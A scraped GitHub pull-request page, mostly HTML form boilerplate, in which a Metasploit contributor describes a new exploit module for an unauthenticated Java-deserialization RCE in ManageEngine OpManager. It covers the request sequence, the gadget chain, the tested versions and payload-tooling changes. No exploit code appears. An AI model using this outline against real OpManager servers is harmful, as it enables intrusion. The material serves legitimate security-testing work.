d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z">
</path>
</svg> Sorry, something went wrong.
</p>
</include-fragment>
</form>
POST /rapid7/metasploit-framework/pull/15670/review_comment/710149942
<form class="js-comment-update" data-type="json" action="/rapid7/metasploit-framework/pull/15670/review_comment/710149942" accept-charset="UTF-8" method="post"><input type="hidden" name="_method" value="put" autocomplete="off"><input type="hidden"
name="authenticity_token" value="wGYUIPcRPXk40zIw5+W59jKyd2D5cmTN3VIN52WLUziQ49hz56gNizWEURLka/107J9OP8694qCldfgod34g7g==" autocomplete="off">
<include-fragment loading="lazy" src="/rapid7/metasploit-framework/pull/15670/review_comment/710149942/edit_form?textarea_id=discussion_r710149942-body&comment_context=discussion"
class="previewable-comment-form js-comment-edit-form-deferred-include-fragment">
<p class="text-center mt-3" data-hide-on-error="">
<svg aria-label="Loading..." style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate">
<circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke"></circle>
<path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke"></path>
</svg>
</p>
<p class="ml-1 mb-2 mt-2" data-show-on-error="" hidden="">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert">
<path fill-rule="evenodd"
d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z">
</path>
</svg> Sorry, something went wrong.
</p>
</include-fragment>
</form>
POST /rapid7/metasploit-framework/reactions
<form class="js-pick-reaction" action="/rapid7/metasploit-framework/reactions" accept-charset="UTF-8" method="post"><input type="hidden" name="_method" value="put" autocomplete="off"><input type="hidden" name="authenticity_token"
value="1N/9Lwvy3QmNrIRtfa97uru+jhDanCTx91uRQ7ZR8IsB78Hdx0AzrS3fMcqTmmEZXxTWMwbxXfqhUFNM7JyFCg==" autocomplete="off">
<input type="hidden" name="input[subjectId]" value="PRRC_kwDOACL9ps4qVAc2">
<div class="comment-reactions-options js-comment-reactions-options">
<button disabled="" class="
btn-link
tooltipped
tooltipped-multiline
d-flex
flex-items-baseline
social-reaction-summary-item
color-text-secondary
reaction-summary-item js-reaction-group-button js-optimistic-reaction-render-button tooltipped-s" style="border-radius:100px;font-size:12px;" name="input[content]" type="submit" value="THUMBS_UP react"
aria-label="wvu-r7 reacted with thumbs up emoji" data-button-index-position="1" data-reaction-content="+1">
<g-emoji alias="+1" fallback-src="https://github.githubassets.com/images/icons/emoji/unicode/1f44d.png" class="social-button-emoji">👍</g-emoji>
<span class="js-discussion-reaction-group-count">1</span>
</button>
</div>
</form>
POST /rapid7/metasploit-framework/issue_comments/922109879
<form class="js-comment-update" id="issuecomment-922109879-edit-form" action="/rapid7/metasploit-framework/issue_comments/922109879" accept-charset="UTF-8" method="post"><input type="hidden" name="_method" value="put" autocomplete="off"><input
type="hidden" data-csrf="true" name="authenticity_token" value="FA6PyMsvuXAiVZ+qKPDisWWhs42DCooY4zA2HkwbgOYLkDYk5oGpw/a/f/TLr/bfiIfbpqWYxjobxKuIHgXwcA==">
<include-fragment loading="lazy" src="/rapid7/metasploit-framework/issue_comments/922109879/edit_form?textarea_id=issuecomment-922109879-body&comment_context=" class="previewable-comment-form js-comment-edit-form-deferred-include-fragment">
<p class="text-center mt-3" data-hide-on-error="">
<svg aria-label="Loading..." style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate">
<circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke"></circle>
<path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke"></path>
</svg>
</p>
<p class="ml-1 mb-2 mt-2" data-show-on-error="" hidden="">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert">
<path fill-rule="evenodd"
d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z">
</path>
</svg> Sorry, something went wrong.
</p>
</include-fragment>
</form>
POST /rapid7/metasploit-framework/pull/15670/review_comment/711378773
<form class="js-comment-update" data-type="json" action="/rapid7/metasploit-framework/pull/15670/review_comment/711378773" accept-charset="UTF-8" method="post"><input type="hidden" name="_method" value="put" autocomplete="off"><input type="hidden"
name="authenticity_token" value="Ilt/QfMPbF2Jnpzceiojq7G5skDmIhQK9EmDnsI3zYLg96+j5W/KhtQ1Y4Y4oqmABMbpO4Hpz8PpCJbQ1qvrsg==" autocomplete="off">
<include-fragment loading="lazy" src="/rapid7/metasploit-framework/pull/15670/review_comment/711378773/edit_form?textarea_id=discussion_r711378773-body&comment_context=discussion"
class="previewable-comment-form js-comment-edit-form-deferred-include-fragment">
<p class="text-center mt-3" data-hide-on-error="">
<svg aria-label="Loading..." style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate">
<circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke"></circle>
<path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke"></path>
</svg>
</p>
<p class="ml-1 mb-2 mt-2" data-show-on-error="" hidden="">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert">
<path fill-rule="evenodd"
d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z">
</path>
</svg> Sorry, something went wrong.
</p>
</include-fragment>
</form>
POST /rapid7/metasploit-framework/reactions
<form class="js-pick-reaction" action="/rapid7/metasploit-framework/reactions" accept-charset="UTF-8" method="post"><input type="hidden" name="_method" value="put" autocomplete="off"><input type="hidden" name="authenticity_token"
value="0HP03SW5HTXY0Psd+HP5reJSW7OYszuJc/+g+BqwY14FQ8gv6QvzkXijTroWRuMOBvgDkETeQoIl9GL3QH0W3w==" autocomplete="off">
<input type="hidden" name="input[subjectId]" value="PRRC_kwDOACL9ps4qZsdV">
<div class="comment-reactions-options js-comment-reactions-options">
</div>
</form>
POST /rapid7/metasploit-framework/reactions
<form class="js-pick-reaction" action="/rapid7/metasploit-framework/reactions" accept-charset="UTF-8" method="post"><input type="hidden" name="_method" value="put" autocomplete="off"><input type="hidden" data-csrf="true" name="authenticity_token"
value="iWac3MVeXE4m7kMq/pyj+l0StwUHQM2yyBA0/KbwQ3yWc0fJxsPVvs2UnnXBpup/2TtSyjtI3LL+NyHuj3+6BA==">
<input type="hidden" name="input[subjectId]" value="IC_kwDOACL9ps42_OKy">
<div class="comment-reactions-options">
<button disabled="" class="
btn-link
tooltipped
tooltipped-multiline
d-flex
flex-items-baseline
social-reaction-summary-item
color-text-secondary
reaction-summary-item tooltipped-se" style="border-radius:100px;font-size:12px;" name="input[content]" type="submit" value="THUMBS_UP react" aria-label="space-r7 reacted with thumbs up emoji" data-button-index-position="0"
data-reaction-content="+1">
<g-emoji alias="thumbs up" fallback-src="https://github.githubassets.com/images/icons/emoji/unicode/1f44d.png" class="social-button-emoji">👍</g-emoji>
<span>1</span>
</button>
</div>
</form>
POST /rapid7/metasploit-framework/issue_comments/922542770
<form class="js-comment-update" id="issuecomment-922542770-edit-form" action="/rapid7/metasploit-framework/issue_comments/922542770" accept-charset="UTF-8" method="post"><input type="hidden" name="_method" value="put" autocomplete="off"><input
type="hidden" data-csrf="true" name="authenticity_token" value="bVdXHpNfYPTkR6JKZO4WhvDWOW9jiXoxGiFfwFSjx0h3VezPlLG/J+5GSrjlHGlbwwQv/GILhsUIo5xRC0u7Yg==">
<include-fragment loading="lazy" src="/rapid7/metasploit-framework/issue_comments/922542770/edit_form?textarea_id=issuecomment-922542770-body&comment_context=" class="previewable-comment-form js-comment-edit-form-deferred-include-fragment">
<p class="text-center mt-3" data-hide-on-error="">
<svg aria-label="Loading..." style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate">
<circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke"></circle>
<path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke"></path>
</svg>
</p>
<p class="ml-1 mb-2 mt-2" data-show-on-error="" hidden="">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert">
<path fill-rule="evenodd"
d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z">
</path>
</svg> Sorry, something went wrong.
</p>
</include-fragment>
</form>
POST /rapid7/metasploit-framework/issue_comments/922959000
<form class="js-comment-update" id="issuecomment-922959000-edit-form" action="/rapid7/metasploit-framework/issue_comments/922959000" accept-charset="UTF-8" method="post"><input type="hidden" name="_method" value="put" autocomplete="off"><input
type="hidden" data-csrf="true" name="authenticity_token" value="z6PDwdDAPPBNLTQNSzBfBxOhe8raj98wMpKHJ3hYYIa/t/nzyy+ftFCHLGrpXVaX0XCOcAIQluG+SCC+tFvIvw==">
<include-fragment loading="lazy" src="/rapid7/metasploit-framework/issue_comments/922959000/edit_form?textarea_id=issuecomment-922959000-body&comment_context=" class="previewable-comment-form js-comment-edit-form-deferred-include-fragment">
<p class="text-center mt-3" data-hide-on-error="">
<svg aria-label="Loading..." style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate">
<circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke"></circle>
<path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke"></path>
</svg>
</p>
<p class="ml-1 mb-2 mt-2" data-show-on-error="" hidden="">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert">
<path fill-rule="evenodd"
d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z">
</path>
</svg> Sorry, something went wrong.
</p>
</include-fragment>
</form>
POST /rapid7/metasploit-framework/issue_comments/923124023
<form class="js-comment-update" id="issuecomment-923124023-edit-form" action="/rapid7/metasploit-framework/issue_comments/923124023" accept-charset="UTF-8" method="post"><input type="hidden" name="_method" value="put" autocomplete="off"><input
type="hidden" data-csrf="true" name="authenticity_token" value="ZBWoxEhMPd9zt/q6YKW+jk/4Lnv6ri4wGF+tJQa4x4qHd/Lu1mLs5bV5pjh7tmQWNOLGIWcI3J03PM/JSkMVyw==">
<include-fragment loading="lazy" src="/rapid7/metasploit-framework/issue_comments/923124023/edit_form?textarea_id=issuecomment-923124023-body&comment_context=" class="previewable-comment-form js-comment-edit-form-deferred-include-fragment">
<p class="text-center mt-3" data-hide-on-error="">
<svg aria-label="Loading..." style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate">
<circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke"></circle>
<path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke"></path>
</svg>
</p>
<p class="ml-1 mb-2 mt-2" data-show-on-error="" hidden="">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert">
<path fill-rule="evenodd"
d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z">
</path>
</svg> Sorry, something went wrong.
</p>
</include-fragment>
</form>
POST /rapid7/metasploit-framework/issue_comments/923125198
<form class="js-comment-update" id="issuecomment-923125198-edit-form" action="/rapid7/metasploit-framework/issue_comments/923125198" accept-charset="UTF-8" method="post"><input type="hidden" name="_method" value="put" autocomplete="off"><input
type="hidden" data-csrf="true" name="authenticity_token" value="78ooDJCyeYyrO84EkoTo9GU/DDrI7zR8j6hDc9sH//yy5EMGAiA58aBzd/SNTRyEl41CWUHag85wMcSAOp760A==">
<include-fragment loading="lazy" src="/rapid7/metasploit-framework/issue_comments/923125198/edit_form?textarea_id=issuecomment-923125198-body&comment_context=" class="previewable-comment-form js-comment-edit-form-deferred-include-fragment">
<p class="text-center mt-3" data-hide-on-error="">
<svg aria-label="Loading..." style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate">
<circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke"></circle>
<path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke"></path>
</svg>
</p>
<p class="ml-1 mb-2 mt-2" data-show-on-error="" hidden="">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert">
<path fill-rule="evenodd"
d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z">
</path>
</svg> Sorry, something went wrong.
</p>
</include-fragment>
</form>
POST /_graphql/MarkNotificationSubjectAsRead
<form class="d-none js-timeline-marker-form" action="/_graphql/MarkNotificationSubjectAsRead" accept-charset="UTF-8" data-remote="true" method="post"><input type="hidden" data-csrf="true" name="authenticity_token"
value="fVgalpe+BinSDYC9Sb0UQU/zs+M5ih1/WyZBvv7AxFm1TMVYge0p2DFb0iGicWV2e5A1tZ/mP5peIYEtoR40qQ==">
<input type="hidden" name="variables[subjectId]" value="MDExOlB1bGxSZXF1ZXN0NzMzMTUyNjA4">
</form>
POST /rapid7/metasploit-framework/pull/15670/review-requests
<form class="js-issue-sidebar-form" aria-label="Select reviewers" data-reviewers-team-size-check-url="/rapid7/metasploit-framework/pull/15670/review-requests/team-size-check" action="/rapid7/metasploit-framework/pull/15670/review-requests"
accept-charset="UTF-8" method="post"><input type="hidden" data-csrf="true" name="authenticity_token" value="zD1qwUWv6ekwetZrh0bfoEu9B/0bkF4KDezD9TM9uWNkBZXW/rLSzWzGsk6LFFCfaO6f1CcJrBoYMHNzPxtHdA==">
<div class="js-large-teams-check-warning-container"></div>
<div class="discussion-sidebar-heading text-bold"> Reviewers </div>
<span class="css-truncate">
<p class="d-flex">
<span class="d-flex min-width-0 flex-1 js-hovercard-left" data-hovercard-type="user" data-hovercard-url="/users/space-r7/hovercard" data-assignee-name="space-r7">
<a class="no-underline" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="/space-r7">
<img class="avatar mr-1 avatar-user" src="https://avatars.githubusercontent.com/u/40177151?s=40&v=4" width="20" height="20" alt="@space-r7">
</a> <a class="assignee Link--primary css-truncate-target width-fit" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="/space-r7">
<span class="css-truncate-target width-fit v-align-middle">space-r7</span>
</a></span>
<a class="flex-order-1" href="/rapid7/metasploit-framework/pull/15670/files/4bccc0541fca74c126930f5e4e0b0a93f5d56652">
<span class="reviewers-status-icon tooltipped tooltipped-nw float-right d-block text-center" aria-label="space-r7 left review comments">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-comment color-icon-secondary">
<path fill-rule="evenodd" d="M2.75 2.5a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h2a.75.75 0 01.75.75v2.19l2.72-2.72a.75.75 0 01.53-.22h4.5a.25.25 0 00.25-.25v-7.5a.25.25 0 00-.25-.25H2.75zM1 2.75C1 1.784 1.784 1 2.75 1h10.5c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0113.25 12H9.06l-2.573 2.573A1.457 1.457 0 014 13.543V12H2.75A1.75 1.75 0 011 10.25v-7.5z"></path>
</svg>
</span>
</a>
</p>
<p class="d-flex">
<span class="d-flex min-width-0 flex-1 js-hovercard-left" data-hovercard-type="user" data-hovercard-url="/users/smcintyre-r7/hovercard" data-assignee-name="smcintyre-r7">
<a class="no-underline" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="/smcintyre-r7">
<img class="avatar mr-1 avatar-user" src="https://avatars.githubusercontent.com/u/58950994?s=40&v=4" width="20" height="20" alt="@smcintyre-r7">
</a> <a class="assignee Link--primary css-truncate-target width-fit" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="/smcintyre-r7">
<span class="css-truncate-target width-fit v-align-middle">smcintyre-r7</span>
</a></span>
<a class="flex-order-1" href="/rapid7/metasploit-framework/pull/15670/files/fb74888a3196e411e08cfc29f3bd9bc94001c8c9">
<span class="reviewers-status-icon tooltipped tooltipped-nw float-right d-block text-center" aria-label="smcintyre-r7 left review comments">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-comment color-icon-secondary">
<path fill-rule="evenodd" d="M2.75 2.5a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h2a.75.75 0 01.75.75v2.19l2.72-2.72a.75.75 0 01.53-.22h4.5a.25.25 0 00.25-.25v-7.5a.25.25 0 00-.25-.25H2.75zM1 2.75C1 1.784 1.784 1 2.75 1h10.5c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0113.25 12H9.06l-2.573 2.573A1.457 1.457 0 014 13.543V12H2.75A1.75 1.75 0 011 10.25v-7.5z"></path>
</svg>
</span>
</a>
</p>
<p class="d-flex">
<span class="d-flex min-width-0 flex-1 js-hovercard-left" data-hovercard-type="user" data-hovercard-url="/users/adfoster-r7/hovercard" data-assignee-name="adfoster-r7">
<a class="no-underline" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="/adfoster-r7">
<img class="avatar mr-1 avatar-user" src="https://avatars.githubusercontent.com/u/60357436?s=40&v=4" width="20" height="20" alt="@adfoster-r7">
</a> <a class="assignee Link--primary css-truncate-target width-fit" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="/adfoster-r7">
<span class="css-truncate-target width-fit v-align-middle">adfoster-r7</span>
</a></span>
<a class="flex-order-1" href="/rapid7/metasploit-framework/pull/15670/files/4b360f9958884758d7aaddcb7f02e0a73e2cf6d8">
<span class="reviewers-status-icon tooltipped tooltipped-nw float-right d-block text-center" aria-label="adfoster-r7 left review comments">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-comment color-icon-secondary">
<path fill-rule="evenodd" d="M2.75 2.5a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h2a.75.75 0 01.75.75v2.19l2.72-2.72a.75.75 0 01.53-.22h4.5a.25.25 0 00.25-.25v-7.5a.25.25 0 00-.25-.25H2.75zM1 2.75C1 1.784 1.784 1 2.75 1h10.5c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0113.25 12H9.06l-2.573 2.573A1.457 1.457 0 014 13.543V12H2.75A1.75 1.75 0 011 10.25v-7.5z"></path>
</svg>
</span>
</a>
</p>
</span>
</form>
POST /rapid7/metasploit-framework/issues/15670/assignees
<form class="js-issue-sidebar-form" aria-label="Select assignees" action="/rapid7/metasploit-framework/issues/15670/assignees" accept-charset="UTF-8" method="post"><input type="hidden" name="_method" value="put" autocomplete="off"><input
type="hidden" data-csrf="true" name="authenticity_token" value="zchOcIeUwFHdJ1PfV3iRbSeHdsrG/XBiM5nRZkqZahU+gkRbB4PpDA9N7kX3Uv/CxFaDKK38fNQHiisnX4ALUQ==">
<div class="discussion-sidebar-heading text-bold"> Assignees </div>
<span class="css-truncate js-issue-assignees">
<p>
<span class="d-flex min-width-0 flex-1 js-hovercard-left" data-hovercard-type="user" data-hovercard-url="/users/space-r7/hovercard" data-assignee-name="space-r7">
<a class="no-underline" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="/space-r7">
<img class="avatar mr-1 avatar-user" src="https://avatars.githubusercontent.com/u/40177151?s=40&v=4" width="20" height="20" alt="@space-r7">
</a> <a class="assignee Link--primary css-truncate-target width-fit" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="/space-r7">
<span class="css-truncate-target width-fit v-align-middle">space-r7</span>
</a> <span class="reviewers-status-icon v-hidden" aria-hidden="true"></span>
</span>
</p>
</span>
</form>
POST /rapid7/metasploit-framework/projects/issues/15670
<form class="js-issue-sidebar-form" aria-label="Select projects" action="/rapid7/metasploit-framework/projects/issues/15670" accept-charset="UTF-8" method="post"><input type="hidden" name="_method" value="put" autocomplete="off"><input type="hidden"
data-csrf="true" name="authenticity_token" value="OZL8DgDpkOfKyE23hLS3kNo1363bvBvbqP/G8ftDaKEAjKa+RYoJkiFpiQKRralGWmLMPkGYi/pxzyZ2bhJBSw==">
<div class="discussion-sidebar-heading text-bold"> Projects </div>
<span class="css-truncate sidebar-progress-bar"> None yet </span>
</form>
POST /rapid7/metasploit-framework/issues/15670/set_milestone?partial=issues%2Fsidebar%2Fshow%2Fmilestone
<form class="js-issue-sidebar-form" aria-label="Select milestones" action="/rapid7/metasploit-framework/issues/15670/set_milestone?partial=issues%2Fsidebar%2Fshow%2Fmilestone" accept-charset="UTF-8" method="post"><input type="hidden" name="_method"
value="put" autocomplete="off"><input type="hidden" data-csrf="true" name="authenticity_token" value="3fzbjcuZapSFJPClRWqoXVOr5idhrMWBKae1j3Yarg1A/5zdIvRCj/JEAptd8Q+PcAmAUwVUeupNmvEdFVUbsw==">
<div class="discussion-sidebar-heading text-bold"> Milestone </div> No milestone
</form>
POST /rapid7/metasploit-framework/issues/closing_references?source_id=733152608&source_type=PULL_REQUEST
<form class="js-issue-sidebar-form" aria-label="Link issues" action="/rapid7/metasploit-framework/issues/closing_references?source_id=733152608&source_type=PULL_REQUEST" accept-charset="UTF-8" method="post"><input type="hidden" name="_method"
value="put" autocomplete="off"><input type="hidden" data-csrf="true" name="authenticity_token" value="feQt4yo30cOjcP+13dMhDlFeXNsoVh89lHS85sSmhOTtgkRF4L2zLJjjMVE7Qb3wwyQjyOWQOce0ro8yo/rbig==">
<div class="discussion-sidebar-heading text-bold"> Linked issues </div>
<p>Successfully merging this pull request may close these issues.</p>
<p>None yet</p>
</form>
Text Content
Skip to content Sign up * Why GitHub? Features → * Mobile → * Actions → * Codespaces → * Packages → * Security → * Code review → * Issues → * Integrations → * GitHub Sponsors → * Customer stories→ * Team * Enterprise * Explore * Explore GitHub → LEARN AND CONTRIBUTE * Topics → * Collections → * Trending → * Learning Lab → * Open source guides → CONNECT WITH OTHERS * The ReadME Project → * Events → * Community forum → * GitHub Education → * GitHub Stars program → * Marketplace * Pricing Plans → * Compare plans → * Contact Sales → * Education → * In this repository All GitHub ↵ Jump to ↵ * No suggested jump to results * In this repository All GitHub ↵ Jump to ↵ * In this organization All GitHub ↵ Jump to ↵ * In this repository All GitHub ↵ Jump to ↵ Sign in Sign up {{ message }} RAPID7 / METASPLOIT-FRAMEWORK PUBLIC * Notifications * Star 25.3k * Fork 11.6k * Code * Issues 468 * Pull requests 26 * Discussions * Actions * Projects 2 * Wiki * Security * Insights More * Code * Issues * Pull requests * Discussions * Actions * Projects * Wiki * Security * Insights New issue Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community. Pick a username Email Address Password Sign up for GitHub By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails. Already on GitHub? Sign in to your account Jump to bottom ADD EXPLOIT FOR CVE-2020-28653 (MANAGEENGINE OPMANAGER RCE) #15670 Merged space-r7 merged 12 commits into rapid7:master from zeroSteiner:feat/cve-2021-3287 16 days ago Merged ADD EXPLOIT FOR CVE-2020-28653 (MANAGEENGINE OPMANAGER RCE) #15670 space-r7 merged 12 commits into rapid7:master from zeroSteiner:feat/cve-2021-3287 16 days ago +502 −92 Conversation 12 Commits 12 Checks 18 Files changed 7 CONVERSATION Copy link Contributor ZEROSTEINER COMMENTED 23 DAYS AGO • EDITED This adds an exploit for CVE-2020-28653 which is an unauthenticated RCE in Manage Engine's OpManager platform. The vulnerability is a Java deserialization flaw in the Smart Update Manager. The exploit itself is pretty straightforward, 2 HTTP requests are made before the serialized Java blob is sent to the server to trigger the vulnerability. The first sets up an HTTP session by obtaining a session cookie, the second puts the established HTTP session in an exploitable state. CVE-2021-3287 is a patch bypass for CVE-2020-28653 which is also supported by this module. Tested: * OpManager 12.5.232 on Ubuntu * OpManager-Central 12.5.328 on Windows Server 2019 * OpManager 12.5.174 on Windows Server 2019 * OpManager 12.3.295 on Windows Server 2019 * OpManager 12.3.238 on Windows Server 2019 * OpManager 12.3.204 on Windows Server 2019 (fails because the gadget chain is incompatible) * NetFlow 12.5.008 on Windows Server 2019 The Msf::Exploit::JavaDeserialization mixin can't be used for this exploit because the YSoSerial payload isn't available in the modified version which has the shell-specific variants. Each target was tested to ensure that the module is setting the shell and escaping the arguments as necessary. JAVA DESERIALIZATION UPDATES This PR makes some updates to the tooling around the YSoSerial payloads. * Fixed a compatibility bug with diff-lcs v1.4, allowing the tool to work with the latest gem * Allowed updating existing data sets (use the new --json option) * Removed the runme.sh script that would regenerate and overwrite all of the payloads * Applied Rubocop changes to the offsets tool * Updated the Dockerfile to accept arguments, making it more flexible * Switched to using an option parser and added long-form names This will be the 13th module using either the Msf::Exploit::JavaDeserialization or Msf::Util::JavaDeserialization utility directly. The payloads that are currently used by those modules are known to work. It doesn't make sense to update all of the YSoSerial payload blobs at once anymore when changes need to be made because each payload should really be tested to ensure that the offsets are correct. The changes to the tool allows individual YSoSerial payloads to be regenerated and merged into the JSON data file. This means only modified payloads need to be tested, while the rest remain the same. In the context of this exploit, this functionality was used to generate and add the frohoff/ysoserial#168 payload which is a derivative of CommonsBeanutils1 but has been updated per the vulnerability analysis to remove the dependency on the commons-collections lib. The name should make it future proof since AFAIK GitHub Pull Requests can't be deleted and the final name is unknown at this point since the changes have only been submitted. If the changes are merged in, the name should be updated. This allows the two PRs to proceed independently of one another, there's no need to wait for frohoff/ysoserial#168 to be merged first. The gadget chain was generated by: 1. Building the PR branch using the supplied Dockerfile 2. Run the image one so it's accessible 3. Use docker cp IMAGEID:/app/ysoserial.jar tools/payloads/ysoserial/ysoserial-original.jar copying the built 